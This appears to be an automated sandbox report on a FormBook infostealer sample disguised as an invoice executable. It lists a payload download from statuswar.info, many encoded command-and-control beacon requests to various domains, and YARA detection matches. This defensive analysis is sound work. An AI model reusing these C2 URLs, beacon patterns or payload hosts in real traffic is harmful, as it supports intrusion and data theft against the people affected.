Source: explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpd
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown DNS traffic detected: queries for: statuswar.info
Source: global traffic HTTP traffic detected: GET /GHDFR/bin_rOlFDOAa61.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: statuswar.infoCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.luxalbridi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.receiptpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK HTTP/1.1Host: www.writingmomsobitwithmom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dczhd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.heyvecino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 162.241.120.147:443 -> 192.168.11.20:49790 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: draft_inv dec21.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02432CD7 1_2_02432CD7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242CB27 1_2_0242CB27
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242D058 1_2_0242D058
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02430A65 1_2_02430A65
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_02431671 1_2_02431671
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242A671 1_2_0242A671
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_024302FD 1_2_024302FD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242FCFD 1_2_0242FCFD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0243069C 1_2_0243069C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E970EAD 8_2_1E970EAD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1EB2 8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E979ED2 8_2_1E979ED2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2EE8 8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E902E48 8_2_1E902E48
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E0E50 8_2_1E8E0E50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97EFBF 8_2_1E97EFBF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E971FC6 8_2_1E971FC6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CCF00 8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FF63 8_2_1E97FF63
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8CDF 8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFCE0 8_2_1E8DFCE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E98ACEB 8_2_1E98ACEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E947CE8 8_2_1E947CE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0C12 8_2_1E8B0C12
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EC4C 8_2_1E96EC4C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97EC60 8_2_1E97EC60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E976C69 8_2_1E976C69
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D2DB0 8_2_1E8D2DB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C9DD0 8_2_1E8C9DD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FD27 8_2_1E97FD27
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E977D4C 8_2_1E977D4C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0D69 8_2_1E8C0D69
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FA89 8_2_1E97FA89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFAA0 8_2_1E8DFAA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97CA13 8_2_1E97CA13
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97EA5B 8_2_1E97EA5B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934BC0 8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8FDB19 8_2_1E8FDB19
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0B10 8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FB2E 8_2_1E97FB2E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D6882 8_2_1E8D6882
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9398B2 8_2_1E9398B2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C28C0 8_2_1E8C28C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9718DA 8_2_1E9718DA
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9778F3 8_2_1E9778F3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3800 8_2_1E8C3800
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EE810 8_2_1E8EE810
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960835 8_2_1E960835
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6868 8_2_1E8A6868
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E935870 8_2_1E935870
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F872 8_2_1E97F872
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C9870 8_2_1E8C9870
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DB870 8_2_1E8DB870
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BE9A0 8_2_1E8BE9A0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97E9A6 8_2_1E97E9A6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9059C0 8_2_1E9059C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8899E8 8_2_1E8899E8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0680 8_2_1E8C0680
